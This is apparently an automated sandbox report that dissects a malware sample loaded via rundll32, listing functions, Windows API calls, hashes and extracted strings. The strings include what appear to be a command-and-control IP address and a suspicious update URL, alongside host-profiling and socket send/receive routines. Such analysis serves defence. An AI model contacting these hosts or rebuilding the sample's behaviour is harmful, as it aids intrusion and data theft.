Opcode ID: 82e7fa39c3969d52ac189780bb4f6fa51eb7b81949c4288554d950475c9387a2
Instruction ID: ec66121f14198de3d98f867200e1df05203b2902541bc923910dfb17062b3852
Opcode Fuzzy Hash: 82e7fa39c3969d52ac189780bb4f6fa51eb7b81949c4288554d950475c9387a2
Instruction Fuzzy Hash: 6221A0711047009FE721DF66C844B5BB7F8FF06308F044A29E5A6D2560D771E50ACF51

Function 04EC3E10 Relevance: 10.6, APIs: 3, Strings: 4, Instructions: 75stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 04EB29FE: _malloc.LIBCMT ref: 04EB2A18

Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC515F
Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC5179
Part of subcall function 04EC5140: GetComputerNameA.KERNEL32(00000000,?), ref: 04EC5199
Part of subcall function 04EC5140: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 04EC51AF
Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC51C3
Part of subcall function 04EC5140: wsprintfA.USER32 ref: 04EC51DB

wsprintfA.USER32 ref: 04EC3E84
lstrcpyA.KERNEL32(00000004,---+++***bbb,04EC4A7C), ref: 04EC3EAF
lstrcpyA.KERNEL32(00000004,81.31.208.36,04EC4A7C), ref: 04EC3ECD

Strings

CopyC, xrefs: 04EC3E25
81.31.208.36, xrefs: 04EC3EC4
---+++***bbb, xrefs: 04EC3EA6
Time, xrefs: 04EC3E14

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: _memsetlstrcpy$wsprintf$ComputerName_malloc
String ID: ---+++***bbb$81.31.208.36$CopyC$Time
API String ID: 98932487-3096327760
Opcode ID: 8a3220f28b0be61a6dbaa709e813dbde71150efaf1f0904d1a8d1abb264e59b9
Instruction ID: ef9d32df536fe1ab89aefb4cc08679320cbb51d8d8aa948ca4a6cf7e526d6952
Opcode Fuzzy Hash: 8a3220f28b0be61a6dbaa709e813dbde71150efaf1f0904d1a8d1abb264e59b9
Instruction Fuzzy Hash: 27213B76600311DFD704CF59E849BDA7765FB8831AF0045BDDD4987200EB35B91AC790

Function 6D062FC7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,6D0630D6,6D04EA46,?,00000000,CE3BFFFF,00000000,?,6D063340,00000022,FlsSetValue,6D0815C4,6D0815CC,CE3BFFFF), ref: 6D063088

Strings

api-ms-, xrefs: 6D06301E
ext-ms-, xrefs: 6D063032

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 4b6dca9b8cf15c4c12f5de1059241d87a8c60645fede76162a18fcbeea36e828
Instruction ID: a8f500b475a66bc1165c0975b5958f988da3e542f26301c5dbe50ddcf7493235
Opcode Fuzzy Hash: 4b6dca9b8cf15c4c12f5de1059241d87a8c60645fede76162a18fcbeea36e828
Instruction Fuzzy Hash: A821D532A05266A7FB229B25DC50B5E37B8AB4B774F250210F915A72C1DB30E904CAF0

Function 04EC7570 Relevance: 7.7, APIs: 5, Instructions: 173COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(76232460,76938400,04ECB824), ref: 04EC75A4
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04EC75BD
_rand.LIBCMT ref: 04EC75CC
wsprintfA.USER32 ref: 04EC7641
LeaveCriticalSection.KERNEL32(?,?,?), ref: 04EC7746

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveVirtual_randwsprintf
String ID:
API String ID: 54394521-0
Opcode ID: 13b4e6424b11e8b1f44a9df015518219a632f1c6b17112158d024255caeced91
Instruction ID: e185a54f93de50893c1c74b6e4db359a63fb573e6aafd0d0cbbf4811fbc48a16
Opcode Fuzzy Hash: 13b4e6424b11e8b1f44a9df015518219a632f1c6b17112158d024255caeced91
Instruction Fuzzy Hash: 4851AEB1A00516AFDB15DF69CD84AAAF7A8FF04318B04966DE819D7200DB34FA56CFD0

Function 6D048C3E Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 6D048C7B
dllmain_crt_dispatch.LIBCMT ref: 6D048C92
dllmain_raw.LIBCMT ref: 6D048CDA
dllmain_crt_dispatch.LIBCMT ref: 6D048CED
dllmain_raw.LIBCMT ref: 6D048D00

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: caac3a85cb19309924262230419df1d399746f6dde916a6ca52609e1db37150d
Instruction ID: a37c56d6aebf441f708bbf0814d819c12ab6c889eb3c83e7871512cb3249236b
Opcode Fuzzy Hash: caac3a85cb19309924262230419df1d399746f6dde916a6ca52609e1db37150d
Instruction Fuzzy Hash: 6E217471D0661AEEEB129E55C940F7F3AB9EB91A94B01C936FC1467250D3308D418BD0

Function 04EC7130 Relevance: 7.6, APIs: 5, Instructions: 73sleepnetworkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,00002000,00000000), ref: 04EC7164
Sleep.KERNEL32(0000001E), ref: 04EC7172
Sleep.KERNEL32(0000001E), ref: 04EC718E
send.WS2_32(?,?,00000000,00000000), ref: 04EC71C1
Sleep.KERNEL32(00000064), ref: 04EC71CF

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: Sleep$send
String ID:
API String ID: 4079979460-0
Opcode ID: 6265d3ed58c05bbe43ed8b377f881081594c64c0fffdac1cd914c11bc06ec6cf
Instruction ID: b32eb20b652daf0c4e9ac0a6589fbcf953d0187cfc47843952cc657c1d2ee629
Opcode Fuzzy Hash: 6265d3ed58c05bbe43ed8b377f881081594c64c0fffdac1cd914c11bc06ec6cf
Instruction Fuzzy Hash: CF21C371901309AFE7248BA9C9CCB8D7BB5FB44355F205269FC05D7381C674AE86CB50

Function 04EC7200 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,0000FFFF,00000080,04ECCA88,00000004), ref: 04EC7222
CancelIo.KERNEL32(?,?,?,04EC79B2,?), ref: 04EC722F
InterlockedExchange.KERNEL32(?,00000000), ref: 04EC723E
closesocket.WS2_32(?), ref: 04EC724B
SetEvent.KERNEL32(?,?,?,04EC79B2,?), ref: 04EC7258

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
String ID:
API String ID: 1486965892-0
Opcode ID: e3f2022e8cda22d72feb2bff6668fa77ca5ebfc0e1ff0b87f450be09e86d4be1
Instruction ID: 54de95bfc60497dd4621745caf6b8dad68da96cd08fa25cbc9d00f2c776d23f6
Opcode Fuzzy Hash: e3f2022e8cda22d72feb2bff6668fa77ca5ebfc0e1ff0b87f450be09e86d4be1
Instruction Fuzzy Hash: 5AF090B1100700EBC360DBA0E849F9677BDEB48311F008A1CB65A86295CB74A804CB61

Function 6D01D1C0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 183encryptionCOMMON

Download Yara Rule

APIs

CertCloseStore.CRYPT32(?,00000000), ref: 6D01D3A8

Strings

schannel: shutting down SSL/TLS connection with %s port %d, xrefs: 6D01D1F7
schannel: failed to send close msg: %s (bytes written: %zd), xrefs: 6D01D32F
schannel: ApplyControlToken failure: %s, xrefs: 6D01D276

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: CertCloseStore
String ID: schannel: ApplyControlToken failure: %s$schannel: failed to send close msg: %s (bytes written: %zd)$schannel: shutting down SSL/TLS connection with %s port %d
API String ID: 3257488527-3473387036
Opcode ID: d7e93c027c63a36444d247942e96c0d3707e1dceffda553a02abb30f67cb5ae2
Instruction ID: 14ae17c84232da3013d741352abc7fda39bb0c7bfb675e1e1595910a83f5f858
Opcode Fuzzy Hash: d7e93c027c63a36444d247942e96c0d3707e1dceffda553a02abb30f67cb5ae2
Instruction Fuzzy Hash: 557127B0508701AFEB20CF64CD44B6BB7F8BB89308F10091CF59997691E775E954CBA2

Function 6D035850 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 140networkCOMMON

Download Yara Rule

APIs

connect.WS2_32(000000FF,?,00000000), ref: 6D0358E8
WSAGetLastError.WS2_32 ref: 6D0358F7
WSASetLastError.WS2_32(?), ref: 6D03592A

Strings

connect to %s port %u failed: %s, xrefs: 6D035953

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLast$connect
String ID: connect to %s port %u failed: %s
API String ID: 375857812-2835513649
Opcode ID: 8b9b8ab5e904a661ddd73de238a2542d8ad5d5a43d71b8d2534f8965284ae8a6
Instruction ID: eca2aed9aad9ac613b9fcee04e93adcb72a0d785fbd98abdf58fee7941d84d06
Opcode Fuzzy Hash: 8b9b8ab5e904a661ddd73de238a2542d8ad5d5a43d71b8d2534f8965284ae8a6
Instruction Fuzzy Hash: F551E430508757AFF7118B34CC44BF6B7E8AF06324F424629EAAD872A1DB61A594C7A1

Function 6D037050 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 89networkCOMMON

Download Yara Rule

APIs

getsockname.WS2_32(?,?,?), ref: 6D0370A3
WSAGetLastError.WS2_32(?,00000000,?), ref: 6D0370AD

Part of subcall function 6D01A850: GetLastError.KERNEL32(?,00000000,?,6D008B2F,00000000,?,00000100,?,?,?,?,?,?,?), ref: 6D01A853

Strings

getsockname() failed with errno %d: %s, xrefs: 6D0370CA
ssloc inet_ntop() failed with errno %d: %s, xrefs: 6D03713C

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLast$getsockname
String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
API String ID: 3066790409-2605427207
Opcode ID: ec819491e7f6e45c89e13b539b8a9f1170278a0389c0c35fdff351488f19b853
Instruction ID: e7fbdcbfdb55cd090b5efcde4e505d36f6be34a6fee2edb473ceefbb0c971250
Opcode Fuzzy Hash: ec819491e7f6e45c89e13b539b8a9f1170278a0389c0c35fdff351488f19b853
Instruction Fuzzy Hash: 6E212376508201BFE720EB64DC41FEB73ECAF49318F858829FA49D7141EF35690987A2

Function 6D03B7E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6D03B400: GetModuleHandleA.KERNEL32(ntdll,RtlVerifyVersionInfo,00000000,?), ref: 6D03B42E
Part of subcall function 6D03B400: GetProcAddress.KERNEL32(00000000), ref: 6D03B435

Part of subcall function 6D00C020: GetModuleHandleA.KERNEL32(kernel32,00000000,?,secur32.dll,6D03B80D,secur32.dll,00000004,00000000,00000000,00000002,00000002,6D00C1D4), ref: 6D00C02A

GetProcAddress.KERNEL32(00000000,InitSecurityInterfaceA), ref: 6D03B81F

Strings

InitSecurityInterfaceA, xrefs: 6D03B819
security.dll, xrefs: 6D03B7FA
secur32.dll, xrefs: 6D03B7FF, 6D03B807

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: InitSecurityInterfaceA$secur32.dll$security.dll
API String ID: 1646373207-3788156360
Opcode ID: a4b787fe27984102b8a9886f07a5b754acfec3f9474c9579d61a8169ffe98713
Instruction ID: 0d06947ed945953341c877b6b34a4a113040f6fb9f784b0966a07bb8f9caf33f
Opcode Fuzzy Hash: a4b787fe27984102b8a9886f07a5b754acfec3f9474c9579d61a8169ffe98713
Instruction Fuzzy Hash: A0F0A7B430070767FF244B358C1AB2E22E19782749F518038A709DA6C1EB34C800CA5C

Function 04EC3FC0 Relevance: 6.1, APIs: 4, Instructions: 69stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 04EC3FD3
lstrcatA.KERNEL32(04EF8238,04ECBCE4,?,?,00000000,00000000,?,04EC4334,00000000,?,?,?,?,?,?,762323A0), ref: 04EC406B

Part of subcall function 04EC34F0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,04EF6A00,00000000,?,?,04EC3FFE), ref: 04EC3501

lstrcatA.KERNEL32(04EF8238,04ECBC04,?,00000000,00000000,?,04EC4334,00000000,?,?,?,?,?,?,762323A0), ref: 04EC4017
lstrcatA.KERNEL32(04EF8238,04ECB7B4,?,00000000,00000000,?,04EC4334,00000000,?,?,?,?,?,?,762323A0), ref: 04EC4023

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: lstrcat$CreateSnapshotToolhelp32_memset
String ID:
API String ID: 2821338896-0
Opcode ID: 811c285e3ae8ac330fb7e2e8fb0a7bc66762348679af4b5878d181c2a6fd3fdf
Instruction ID: e27071de8886977b68615e5720414d3977aed4d6a63b40ec52520ba13f60f469
Opcode Fuzzy Hash: 811c285e3ae8ac330fb7e2e8fb0a7bc66762348679af4b5878d181c2a6fd3fdf
Instruction Fuzzy Hash: F3113871B407006BFA146FE8AD5BA577358EF8179CB046128FE8597101EA71F8238BE1

Function 6CFF1E80 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

Part of subcall function 6CFF5C00: AcquireSRWLockExclusive.KERNEL32(6D08A44C,?,6CFF1EB7,93BD9D6B,76230BD0,76230F00), ref: 6CFF5C06
Part of subcall function 6CFF5C00: ReleaseSRWLockExclusive.KERNEL32(6D08A44C,76230F00), ref: 6CFF5C2A

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CFF1F56
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CFF209E

Strings

https://www.dj5a2sbj.icu/yj/update.xml, xrefs: 6CFF1F65

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ExclusiveIos_base_dtorLockstd::ios_base::_$AcquireRelease
String ID: https://www.dj5a2sbj.icu/yj/update.xml
API String ID: 2960325935-1378649669
Opcode ID: 8718f7430024e22ba2be338c9d188b26385f48f1e879ff1aec6df2f066d1f67a
Instruction ID: 26dfa4e6890375d42a4dc3d43ddcd416396d6fd215c3709bfe73fafc6fdecb7f
Opcode Fuzzy Hash: 8718f7430024e22ba2be338c9d188b26385f48f1e879ff1aec6df2f066d1f67a
Instruction Fuzzy Hash: D351B0759412189BEB10CF14DC89FDAB7B8EF04708F1440A5E919A7391EB72EE89CF91

Function 6D035BD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,00000000), ref: 6D035C40
WSAGetLastError.WS2_32 ref: 6D035C4D

Strings

Recv failure: %s, xrefs: 6D035C76

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLastrecv
String ID: Recv failure: %s
API String ID: 2514157807-4276829032
Opcode ID: 3ea7e0d2076df870cd23478910d50681c259cb47dcc8c40d00fb9601e6e55107
Instruction ID: d466152505062ca2b12f00290d37cb2dfd3ba2043c8ad14739adf0e59129efee
Opcode Fuzzy Hash: 3ea7e0d2076df870cd23478910d50681c259cb47dcc8c40d00fb9601e6e55107
Instruction Fuzzy Hash: B231CD745083109FE321DF28C884BEAB7F4FF8E318F054A29E99997352D771A955CB82

Function 6D035AE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,00000000), ref: 6D035B4C
WSAGetLastError.WS2_32 ref: 6D035B5B

Strings

Send failure: %s, xrefs: 6D035B84

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLastsend
String ID: Send failure: %s
API String ID: 1802528911-857917747
Opcode ID: fc73a53c576fbe74ec89cc92d5308e697ce26979c3ed3beca1efa54f29cde032
Instruction ID: a7b1d7f3435432130bfae8b6051b358d1f966898f1eaab72e3be16a35cfe91a2
Opcode Fuzzy Hash: fc73a53c576fbe74ec89cc92d5308e697ce26979c3ed3beca1efa54f29cde032
Instruction Fuzzy Hash: 5A2139755082119FD321DF14C884FEAB7F4FF8E310F014669E9999B241C771A955CB92

Function 04EC7770 Relevance: 4.7, APIs: 3, Instructions: 191COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 04EC7874
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 04EC78F7
__CxxThrowException@8.LIBCMT ref: 04EC798F

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: Exception@8FreeThrowVirtualwsprintf
String ID:
API String ID: 431775021-0
Opcode ID: 265fe213b91f332904f83760c5686f0a2f7005f84a95f82bbd283de1bf31583c
Instruction ID: a58382b1f86a94f1816d23436ffef236642c0ad443d8441a70ce9675f7f6f0c1
Opcode Fuzzy Hash: 265fe213b91f332904f83760c5686f0a2f7005f84a95f82bbd283de1bf31583c
Instruction Fuzzy Hash: D2618EB1A002168FDB24DF69CD84AABB7B5EF88314F1495ADE90997340EA35FD41CF90

Function 6D01C090 Relevance: 4.6, APIs: 3, Instructions: 140networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,?,?,?), ref: 6D01C0B1
freeaddrinfo.WS2_32(?,?), ref: 6D01C1C6
WSASetLastError.WS2_32(00002AF9,?), ref: 6D01C210

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLastfreeaddrinfogetaddrinfo
String ID:
API String ID: 1817844550-0
Opcode ID: cf168297799817cc53bb1a9bcdc1b94adcc55b6aef48689403b47b7d11b39c63
Instruction ID: 4c75bb7237e442a56866dcd715597ac05e7e72a24bd2b13478b7818982135f4e
Opcode Fuzzy Hash: cf168297799817cc53bb1a9bcdc1b94adcc55b6aef48689403b47b7d11b39c63
Instruction Fuzzy Hash: CF518D71A483128BEB11CF99C880B2BF7F4BF8A714F05496DEC999B211D731E904CB95

Function 04EC7DD0 Relevance: 4.6, APIs: 3, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 04EC7E11
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,?,?,?,?,?,04EC8015), ref: 04EC7E4D
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,04EC8015,00000000), ref: 04EC7E8C

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: Virtual$AllocFree__floor_pentium4
String ID:
API String ID: 2605973128-0
Opcode ID: 8ad64454121936d459a1934aa9539f2935081e197196d5faa000ac45b1b0a835
Instruction ID: da9c0b6369975e8e4b8e282c800ccd1a924ac004c6dbe04fdfbac3745f989a44
Opcode Fuzzy Hash: 8ad64454121936d459a1934aa9539f2935081e197196d5faa000ac45b1b0a835
Instruction Fuzzy Hash: D32108717087059FD7508F6EE981A2BFBE4EF80759F405A2DF999C2690E630F8018B51

Function 04EC7EB0 Relevance: 4.6, APIs: 3, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 04EC7EE6
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04EC7F1D

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: AllocVirtual__floor_pentium4
String ID:
API String ID: 4174053956-0
Opcode ID: d73c2332881d042dc47ec13380035c714720853086dfbf03a5188a6ed23cfc13
Instruction ID: 6e21c20160893851ac4bc614cac51cff06573e44fa3adab7a14b4af872cbaa4b
Opcode Fuzzy Hash: d73c2332881d042dc47ec13380035c714720853086dfbf03a5188a6ed23cfc13
Instruction Fuzzy Hash: 5F21F2717087419FD7508F2AEE8162BB7E8FF80716F005A2DF999C2680E631EC018B56

Function 6D048A87 Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

